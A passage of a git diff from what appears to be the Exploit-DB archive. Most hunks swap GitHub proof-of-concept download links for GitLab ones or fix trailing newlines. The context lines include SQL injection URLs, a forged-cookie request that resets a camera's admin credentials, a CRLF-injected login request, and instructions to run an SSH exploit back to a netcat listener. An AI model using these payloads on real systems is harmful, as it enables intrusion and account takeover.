intended to be used only on research devices that don't store user data. This specific exploit is known to sometimes cause data corruption. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45379.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45379.zip \ No newline at end of file diff --git a/exploits/android/local/47463.txt b/exploits/android/local/47463.txt index 5ca2c0ff7..017badd99 100644 --- a/exploits/android/local/47463.txt +++ b/exploits/android/local/47463.txt @@ -77,4 +77,4 @@ Vendor statement from Android: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47463.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47463.zip \ No newline at end of file diff --git a/exploits/android/local/9477.txt b/exploits/android/local/9477.txt index a27f36c6c..5c9ee8848 100644 --- a/exploits/android/local/9477.txt +++ b/exploits/android/local/9477.txt @@ -1,6 +1,6 @@ Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later. http://zenthought.org/content/file/android-root-2009-08-16-source -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9477.tar.gz (android-root-20090816.tar.gz) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9477.tar.gz (android-root-20090816.tar.gz) # milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/exploits/android/remote/39640.txt b/exploits/android/remote/39640.txt index eab4df080..f1067b1dc 100644 --- a/exploits/android/remote/39640.txt +++ b/exploits/android/remote/39640.txt @@ -24,4 +24,4 @@ Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosti Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39640.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39640.zip \ No newline at end of file diff --git a/exploits/android/remote/40354.txt b/exploits/android/remote/40354.txt index 9f314839d..110bb4560 100644 --- a/exploits/android/remote/40354.txt +++ b/exploits/android/remote/40354.txt @@ -156,4 +156,4 @@ bool Parcel::enforceInterface(const String16& interface, Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40354.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40354.zip \ No newline at end of file diff --git a/exploits/android/remote/40874.txt b/exploits/android/remote/40874.txt index be3ebf6ca..724dc0855 100644 --- a/exploits/android/remote/40874.txt +++ b/exploits/android/remote/40874.txt @@ -88,4 +88,4 @@ This notification will be of size THREAD_SIZE*2, and will therefore fill up the Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40874.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40874.zip \ No newline at end of file diff --git a/exploits/arm/dos/40182.txt b/exploits/arm/dos/40182.txt index 81f032bf8..985402d9d 100644 --- a/exploits/arm/dos/40182.txt +++ b/exploits/arm/dos/40182.txt @@ -78,4 +78,4 @@ I have attached a completely untested patch that should fix the x86, arm and arm Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40182.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40182.zip \ No newline at end of file diff --git a/exploits/asp/remote/15213.pl b/exploits/asp/remote/15213.pl index 874114d95..8589908a6 100755 --- a/exploits/asp/remote/15213.pl +++ b/exploits/asp/remote/15213.pl @@ -10,7 +10,7 @@ # Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2. # A similar exploitation vector was also added lately in Padbuster v0.3: # http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/ -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15213.pl (padBuster.pl) +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15213.pl (padBuster.pl) # # # Giorgio Fedon - (giorgio.fedon@mindedsecurity.com) diff --git a/exploits/asp/webapps/14192.txt b/exploits/asp/webapps/14192.txt index a62cb914a..2742b47e0 100644 --- a/exploits/asp/webapps/14192.txt +++ b/exploits/asp/webapps/14192.txt @@ -17,4 +17,4 @@ Thank You For Your Perfect Web Site. http://server/main.asp?id=5945&grp=[SQL Injection] -[~]######################################### FinisH :D #############################################[~] +[~]######################################### FinisH :D #############################################[~] \ No newline at end of file diff --git a/exploits/asp/webapps/14821.txt b/exploits/asp/webapps/14821.txt index 2d72cace0..55fd0134d 100644 --- a/exploits/asp/webapps/14821.txt +++ b/exploits/asp/webapps/14821.txt @@ -16,4 +16,4 @@ admin page : http://site.com/[path]/admin.asp Victem : http://www.etoshop.com/demo/pcstore --------------------------------------------------------- -######################################################### +######################################################### \ No newline at end of file diff --git a/exploits/asp/webapps/14898.txt b/exploits/asp/webapps/14898.txt index 5abac131c..011daa55c 100644 --- a/exploits/asp/webapps/14898.txt +++ b/exploits/asp/webapps/14898.txt @@ -122,4 +122,4 @@ Persistent XSS Vulnerabilities: entity.Title = txtTitle_E.Text.Trim(); -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/14954.txt b/exploits/asp/webapps/14954.txt index 663163dbc..0b1cc6198 100644 --- a/exploits/asp/webapps/14954.txt +++ b/exploits/asp/webapps/14954.txt @@ -64,4 +64,4 @@ PoC: shell.aspx ---> http://Example.com/downloads/uploads/2010_7_25_shell.aspx Note that : the value 2010_7_25 is the exact date of server. -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/14969.txt b/exploits/asp/webapps/14969.txt index 05eecd590..0ab33e4e7 100644 --- a/exploits/asp/webapps/14969.txt +++ b/exploits/asp/webapps/14969.txt @@ -65,4 +65,4 @@ Description : Which the Password was encrypted by SHA algorithm using .../lib/sha256.asp file. -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/14991.txt b/exploits/asp/webapps/14991.txt index f3cdb9ba1..490a78776 100644 --- a/exploits/asp/webapps/14991.txt +++ b/exploits/asp/webapps/14991.txt @@ -35,4 +35,4 @@ Description : http://Example.com/Images/ -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/14999.txt b/exploits/asp/webapps/14999.txt index 308b052b6..c55ae8813 100644 --- a/exploits/asp/webapps/14999.txt +++ b/exploits/asp/webapps/14999.txt @@ -73,4 +73,4 @@ Persistent XSS: } -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15058.html b/exploits/asp/webapps/15058.html index cec16bcc6..da6fd81ac 100644 --- a/exploits/asp/webapps/15058.html +++ b/exploits/asp/webapps/15058.html @@ -82,4 +82,4 @@ This page remove Admins Role in VWD-CMS. -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15067.txt b/exploits/asp/webapps/15067.txt index f25d171be..61ee1c7eb 100644 --- a/exploits/asp/webapps/15067.txt +++ b/exploits/asp/webapps/15067.txt @@ -178,4 +178,4 @@ Persistent XSS and XSRF: --------------------------------------------------------------------------------------- -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15078.txt b/exploits/asp/webapps/15078.txt index c45aef19f..9f6077892 100644 --- a/exploits/asp/webapps/15078.txt +++ b/exploits/asp/webapps/15078.txt @@ -182,4 +182,4 @@ This page uploads a file </html> -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15106.txt b/exploits/asp/webapps/15106.txt index afdc90726..dfa6fa217 100644 --- a/exploits/asp/webapps/15106.txt +++ b/exploits/asp/webapps/15106.txt @@ -60,4 +60,4 @@ Persistent XSS in admin section: http://Example.com/SearchResults.aspx?q={} -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15124.txt b/exploits/asp/webapps/15124.txt index ba78d0dd7..87a65226c 100644 --- a/exploits/asp/webapps/15124.txt +++ b/exploits/asp/webapps/15124.txt @@ -41,4 +41,4 @@ Description : and so on. -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15160.txt b/exploits/asp/webapps/15160.txt index 43173fefd..0cb95c349 100644 --- a/exploits/asp/webapps/15160.txt +++ b/exploits/asp/webapps/15160.txt @@ -159,4 +159,4 @@ This page uploads a file with "xml" extension </body> </html> -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15703.txt b/exploits/asp/webapps/15703.txt index 7b3970a4a..7617c6145 100644 --- a/exploits/asp/webapps/15703.txt +++ b/exploits/asp/webapps/15703.txt @@ -33,6 +33,4 @@ Personal # KinG,Bl4ckl0rd,Turk_server -# Special Thanks : Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon - - +# Special Thanks : Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon \ No newline at end of file diff --git a/exploits/asp/webapps/16241.txt b/exploits/asp/webapps/16241.txt index c8dd4416d..9cef3e5a8 100644 --- a/exploits/asp/webapps/16241.txt +++ b/exploits/asp/webapps/16241.txt @@ -23,5 +23,4 @@ http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE POC --- http://www.site.com/news/news.asp?id=256 and 1=1 TRUE -http://www.site.com/news/news.asp?id=256 and 1=0 FALSE - +http://www.site.com/news/news.asp?id=256 and 1=0 FALSE \ No newline at end of file diff --git a/exploits/asp/webapps/32660.txt b/exploits/asp/webapps/32660.txt index 243fcd01e..7c9f98132 100644 --- a/exploits/asp/webapps/32660.txt +++ b/exploits/asp/webapps/32660.txt @@ -7,7 +7,4 @@ [+] Tested on: Windows 7 and Linux [+] Vulnerable File: default.asp [+} Dork : intext:"Powered by CIS Manager" -[+] Exploit : http://host/site/default.asp?TroncoID=[SQL Injection] - - - +[+] Exploit : http://host/site/default.asp?TroncoID=[SQL Injection] \ No newline at end of file diff --git a/exploits/asp/webapps/42776.txt b/exploits/asp/webapps/42776.txt index 0368abf82..d6d8c5e4e 100644 --- a/exploits/asp/webapps/42776.txt +++ b/exploits/asp/webapps/42776.txt @@ -10,4 +10,4 @@ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42776.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42776.zip \ No newline at end of file diff --git a/exploits/asp/webapps/42792.txt b/exploits/asp/webapps/42792.txt index c032dafdd..27f4d3127 100644 --- a/exploits/asp/webapps/42792.txt +++ b/exploits/asp/webapps/42792.txt @@ -73,4 +73,4 @@ Help AG Middle East References ---------- [1] Help AG Middle East http://www.helpag.com/ -[2] Sitefinity CMS Version Notes http://www.sitefinity.com/product/version-notes +[2] Sitefinity CMS Version Notes http://www.sitefinity.com/product/version-notes \ No newline at end of file diff --git a/exploits/asp/webapps/8719.py b/exploits/asp/webapps/8719.py index fac2a895e..c39555a56 100755 --- a/exploits/asp/webapps/8719.py +++ b/exploits/asp/webapps/8719.py @@ -15,7 +15,7 @@ # for working with this exploit you need two asp file for updating hash you can download both from : # www.abysssec.com/files/dana.zip -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8719.zip (2009-dana.zip) +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8719.zip (2009-dana.zip) # then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code diff --git a/exploits/aspx/webapps/47793.txt b/exploits/aspx/webapps/47793.txt index d1ebe0677..e6b2bdc5c 100644 --- a/exploits/aspx/webapps/47793.txt +++ b/exploits/aspx/webapps/47793.txt @@ -47,4 +47,4 @@ Thanks @mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47793.zip \ No newline at end of file diff --git a/exploits/beos/local/19840.txt b/exploits/beos/local/19840.txt index 2f4904c0e..d75e41ad7 100644 --- a/exploits/beos/local/19840.txt +++ b/exploits/beos/local/19840.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1098/info A direct system call containing invalid parameters through int 0x25 will cause the BeOS to crash. Reboot of the machine is required in order to regain normal functionality. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19840.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19840.tgz \ No newline at end of file diff --git a/exploits/bsd/dos/19488.c b/exploits/bsd/dos/19488.c index 169ca5fec..4fac2e88e 100644 --- a/exploits/bsd/dos/19488.c +++ b/exploits/bsd/dos/19488.c @@ -31,7 +31,4 @@ write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); -} - - - +} \ No newline at end of file diff --git a/exploits/bsd/local/19411.txt b/exploits/bsd/local/19411.txt index 83ecdb175..97f095ff5 100644 --- a/exploits/bsd/local/19411.txt +++ b/exploits/bsd/local/19411.txt @@ -10,4 +10,4 @@ Hacker writes directly to device previously mounted as /usr, clearing file flags Hacker mounts modified device as /usr. Hacker installs backdoored /usr/bin/login. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19411.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19411.tgz \ No newline at end of file diff --git a/exploits/bsd/local/23655.txt b/exploits/bsd/local/23655.txt index 18fcaa100..6094ee268 100644 --- a/exploits/bsd/local/23655.txt +++ b/exploits/bsd/local/23655.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/9586/info A vulnerability has been reported to reside in the 'shmat()' system call used in the BSD kernel. Exploiting this issue may allow a local attacker to inject instructions into the memory of a privileged process. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23655.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23655.tar.gz \ No newline at end of file diff --git a/exploits/bsd/remote/19520.txt b/exploits/bsd/remote/19520.txt index 41a604b1e..c357ee7b7 100644 --- a/exploits/bsd/remote/19520.txt +++ b/exploits/bsd/remote/19520.txt @@ -3,7 +3,7 @@ This exploit was leaked on the Full Disclosure mailing list: http://seclists.org/fulldisclosure/2012/Jun/404 -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19520.zip +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19520.zip BSD telnetd Remote Root Exploit *ZERODAY* diff --git a/exploits/cfm/webapps/15120.txt b/exploits/cfm/webapps/15120.txt index ef985e2f3..e064064a4 100644 --- a/exploits/cfm/webapps/15120.txt +++ b/exploits/cfm/webapps/15120.txt @@ -105,5 +105,4 @@ References * Vendor advisory: http://www.getmura.com/index.cfm/blog/critical-security-patch/ - * CVE item: CVE-2010-3468 - + * CVE item: CVE-2010-3468 \ No newline at end of file diff --git a/exploits/cfm/webapps/16225.txt b/exploits/cfm/webapps/16225.txt index cb1cdfc6d..e44018d74 100644 --- a/exploits/cfm/webapps/16225.txt +++ b/exploits/cfm/webapps/16225.txt @@ -6,6 +6,4 @@ Dork : intext:"Powered by Alcassoft SOPHIA" SQL --- -http://site.com/path/dsp_page.cfm?pageid=[SQL] - - +http://site.com/path/dsp_page.cfm?pageid=[SQL] \ No newline at end of file diff --git a/exploits/cgi/webapps/22169.pl b/exploits/cgi/webapps/22169.pl index c63f5fc21..a5b44c2a4 100755 --- a/exploits/cgi/webapps/22169.pl +++ b/exploits/cgi/webapps/22169.pl @@ -129,4 +129,4 @@ be somewhere in the html output\n"; print $recv; print "the above is received from the server, if you have a 404 or 403, theres somethin wrong if not, and no command output, try again.. - if command ouput buggy, convert \\v to \\n with tr\n"; + if command ouput buggy, convert \\v to \\n with tr\n"; \ No newline at end of file diff --git a/exploits/cgi/webapps/28321.pl b/exploits/cgi/webapps/28321.pl index c723c687f..ba7843f9b 100755 --- a/exploits/cgi/webapps/28321.pl +++ b/exploits/cgi/webapps/28321.pl @@ -47,4 +47,4 @@ chmod -R 777 /mail/tmp/ ## Create smb backup mount point /bin/mkdir -p /mnt/smb/ -chmod 777 /mnt/smb/ +chmod 777 /mnt/smb/ \ No newline at end of file diff --git a/exploits/cgi/webapps/29844.txt b/exploits/cgi/webapps/29844.txt index a70164879..743dc1385 100644 --- a/exploits/cgi/webapps/29844.txt +++ b/exploits/cgi/webapps/29844.txt @@ -12,7 +12,4 @@ Cookie: cosign=X Content-Type: application/x-www-form-urlencoded Content-Length: N -required=&ref=https%3A%2F%2Fweblogin.example.com%2F&service=cosign-servicename=Y%0DLOGIN cosign=X2 1.2.3.4 username%0DREGISTER cosign=X2 1.2.3.4 cosign-servicename=Y2&login=test&password=pass&passcode=&doLogin=Log+In - - - +required=&ref=https%3A%2F%2Fweblogin.example.com%2F&service=cosign-servicename=Y%0DLOGIN cosign=X2 1.2.3.4 username%0DREGISTER cosign=X2 1.2.3.4 cosign-servicename=Y2&login=test&password=pass&passcode=&doLogin=Log+In \ No newline at end of file diff --git a/exploits/cgi/webapps/39871.txt b/exploits/cgi/webapps/39871.txt index 533462eaa..650348104 100644 --- a/exploits/cgi/webapps/39871.txt +++ b/exploits/cgi/webapps/39871.txt @@ -41,5 +41,4 @@ Raw Response: MTI3LjAuMC4xCWxvY2FsaG9zdC5sb2NhbGRvbWFpbglsb2NhbGhvc3QK - Base64 Decoded: 127.0.0.1 localhost.localdomain localhost - + Base64 Decoded: 127.0.0.1 localhost.localdomain localhost \ No newline at end of file diff --git a/exploits/cgi/webapps/40272.txt b/exploits/cgi/webapps/40272.txt index 2f53bfd92..2ad9d611c 100644 --- a/exploits/cgi/webapps/40272.txt +++ b/exploits/cgi/webapps/40272.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40272.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40272.zip \ No newline at end of file diff --git a/exploits/cgi/webapps/40273.txt b/exploits/cgi/webapps/40273.txt index 6d8aacf1d..195c68b46 100644 --- a/exploits/cgi/webapps/40273.txt +++ b/exploits/cgi/webapps/40273.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40273.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40273.zip \ No newline at end of file diff --git a/exploits/cgi/webapps/40274.txt b/exploits/cgi/webapps/40274.txt index e26bc9124..47e6c1108 100644 --- a/exploits/cgi/webapps/40274.txt +++ b/exploits/cgi/webapps/40274.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40274.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40274.zip \ No newline at end of file diff --git a/exploits/cgi/webapps/40303.sh b/exploits/cgi/webapps/40303.sh index 1ba96679f..eec0c8972 100755 --- a/exploits/cgi/webapps/40303.sh +++ b/exploits/cgi/webapps/40303.sh @@ -42,4 +42,4 @@ if [ $? -ne 0 ]; then echo " [ Error : libwww-perl not found =/" exit; fi - GET -H "Cookie: frame_rate=8; expansion=10; mode=43; user_id=guest; user_auth_level=43; behind_firewall=0" "http://$1/userconfigsubmit.cgi?adminid=$2&adpasswd=$3&repasswd=$3&user1=guest&userpw1=1337&repasswd1=1337&max_frame_user1=8&authority1=41&user2=&userpw2=&repasswd2=&max_frame_user2=6&authority2=40&user3=&userpw3=&repasswd3=&max_frame_user3=6&authority3=40&user4=&userpw4=&repasswd4=&max_frame_user4=6&authority4=40&user5=&userpw5=&repasswd5=&max_frame_user5=6&authority5=40&submit=submit" 0&> /dev/null <&1 + GET -H "Cookie: frame_rate=8; expansion=10; mode=43; user_id=guest; user_auth_level=43; behind_firewall=0" "http://$1/userconfigsubmit.cgi?adminid=$2&adpasswd=$3&repasswd=$3&user1=guest&userpw1=1337&repasswd1=1337&max_frame_user1=8&authority1=41&user2=&userpw2=&repasswd2=&max_frame_user2=6&authority2=40&user3=&userpw3=&repasswd3=&max_frame_user3=6&authority3=40&user4=&userpw4=&repasswd4=&max_frame_user4=6&authority4=40&user5=&userpw5=&repasswd5=&max_frame_user5=6&authority5=40&submit=submit" 0&> /dev/null <&1 \ No newline at end of file diff --git a/exploits/cgi/webapps/40304.txt b/exploits/cgi/webapps/40304.txt index 8648aa175..ea685f139 100644 --- a/exploits/cgi/webapps/40304.txt +++ b/exploits/cgi/webapps/40304.txt @@ -31,4 +31,4 @@ path=/ #root:x:0:0:root:/root:/bin/sh #root:x:0:0:root:/root:/usr/bin/cmd #tw:x:504:504::/home/tw:/bin/bash -#tw:x:504:504::/home/tw:/bin/msh +#tw:x:504:504::/home/tw:/bin/msh \ No newline at end of file diff --git a/exploits/freebsd/local/12090.txt b/exploits/freebsd/local/12090.txt index 921061102..a750030f1 100644 --- a/exploits/freebsd/local/12090.txt +++ b/exploits/freebsd/local/12090.txt @@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri improper handling of environment variables. Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12090.pdf (cybsec_advisory_2010_0404.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12090.pdf (cybsec_advisory_2010_0404.pdf) \ No newline at end of file diff --git a/exploits/freebsd/local/12091.txt b/exploits/freebsd/local/12091.txt index ee8f5652d..a7ccfec01 100644 --- a/exploits/freebsd/local/12091.txt +++ b/exploits/freebsd/local/12091.txt @@ -14,4 +14,4 @@ Vulnerability Description: Some files that allow to obtain usernames and other internal information can be read by any user inside the CLI. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12091.pdf (cybsec_advisory_2010_0403.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12091.pdf (cybsec_advisory_2010_0403.pdf) \ No newline at end of file diff --git a/exploits/freebsd/remote/17462.txt b/exploits/freebsd/remote/17462.txt index 9651977fd..21e885190 100644 --- a/exploits/freebsd/remote/17462.txt +++ b/exploits/freebsd/remote/17462.txt @@ -196,7 +196,7 @@ Kingcope A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. the statically linked binary can be downloaded from http://isowarez.de/ssh_0day -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17462.tar.gz (ssh_0day.tar.gz) +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17462.tar.gz (ssh_0day.tar.gz) run like ./ssh -1 -z <yourip> <target> setup a netcat, port 443 on yourip first \ No newline at end of file diff --git a/exploits/freebsd/remote/18181.txt b/exploits/freebsd/remote/18181.txt index dfd347871..f0e4704e3 100644 --- a/exploits/freebsd/remote/18181.txt +++ b/exploits/freebsd/remote/18181.txt @@ -33,4 +33,4 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :> /Signed "the awesome" Kingcope Code: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18181.tar (7350roaringbeastv3.tar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18181.tar (7350roaringbeastv3.tar) \ No newline at end of file diff --git a/exploits/freebsd/remote/20593.txt b/exploits/freebsd/remote/20593.txt index d0ec94686..2783c8041 100644 --- a/exploits/freebsd/remote/20593.txt +++ b/exploits/freebsd/remote/20593.txt @@ -8,4 +8,4 @@ It is possible for packets that are not part of an established connection to be Exploitation of this vulnerability may allow for unauthorized remote access to otherwise protected services. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20593.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20593.tgz \ No newline at end of file diff --git a/exploits/freebsd/webapps/12658.txt b/exploits/freebsd/webapps/12658.txt index e6900b39c..fc1225cbc 100644 --- a/exploits/freebsd/webapps/12658.txt +++ b/exploits/freebsd/webapps/12658.txt @@ -15,4 +15,4 @@ improper profile check. =========== Download: =========== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf) \ No newline at end of file diff --git a/exploits/freebsd/webapps/24439.txt b/exploits/freebsd/webapps/24439.txt index d4b8b3c09..52647052e 100644 --- a/exploits/freebsd/webapps/24439.txt +++ b/exploits/freebsd/webapps/24439.txt @@ -48,4 +48,4 @@ ┌──────────────────┘ Dimitris Strevinas Obrela Security Industries - CONTACT: www.obrela.com + CONTACT: www.obrela.com \ No newline at end of file diff --git a/exploits/hardware/dos/11043.txt b/exploits/hardware/dos/11043.txt index 637a1381f..407af02d6 100644 --- a/exploits/hardware/dos/11043.txt +++ b/exploits/hardware/dos/11043.txt @@ -36,4 +36,4 @@ Email : f3arm3d3ar@gmail.com =============== Download =============== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11043.rar (Sony_Ericsson.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11043.rar (Sony_Ericsson.rar) \ No newline at end of file diff --git a/exploits/hardware/dos/11880.txt b/exploits/hardware/dos/11880.txt index 02110a319..7dd9b2939 100644 --- a/exploits/hardware/dos/11880.txt +++ b/exploits/hardware/dos/11880.txt @@ -106,4 +106,4 @@ close $sock; ##################################################################################### -(PRL-2010-01) +(PRL-2010-01) \ No newline at end of file diff --git a/exploits/hardware/dos/12093.txt b/exploits/hardware/dos/12093.txt index 0409d3849..9ac86c0cf 100644 --- a/exploits/hardware/dos/12093.txt +++ b/exploits/hardware/dos/12093.txt @@ -15,4 +15,4 @@ Users inside the CLI can run some kind of “Fork Bomb” in order to saturate s of an insecure ulimit value. Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12093.pdf (cybsec_advisory_2010_0401.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12093.pdf (cybsec_advisory_2010_0401.pdf) \ No newline at end of file diff --git a/exploits/hardware/dos/13823.txt b/exploits/hardware/dos/13823.txt index f4b72717f..839999428 100644 --- a/exploits/hardware/dos/13823.txt +++ b/exploits/hardware/dos/13823.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13823.xls (savysoda_poc.xls) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13823.xls (savysoda_poc.xls) \ No newline at end of file diff --git a/exploits/hardware/dos/13824.txt b/exploits/hardware/dos/13824.txt index 3cc1f8e2b..519c4eeab 100644 --- a/exploits/hardware/dos/13824.txt +++ b/exploits/hardware/dos/13824.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13824.xls (office2_poc.xls) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13824.xls (office2_poc.xls) \ No newline at end of file diff --git a/exploits/hardware/dos/13825.txt b/exploits/hardware/dos/13825.txt index 41f3007e2..2ade278b0 100644 --- a/exploits/hardware/dos/13825.txt +++ b/exploits/hardware/dos/13825.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13825.xls (goodreader_poc.xls) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13825.xls (goodreader_poc.xls) \ No newline at end of file diff --git a/exploits/hardware/dos/18751.txt b/exploits/hardware/dos/18751.txt index 1a074f619..20254c582 100644 --- a/exploits/hardware/dos/18751.txt +++ b/exploits/hardware/dos/18751.txt @@ -130,7 +130,7 @@ other bugs and understanding them :) http://aluigi.org/poc/samsux_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18751.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18751.zip ####################################################################### diff --git a/exploits/hardware/dos/20821.txt b/exploits/hardware/dos/20821.txt index 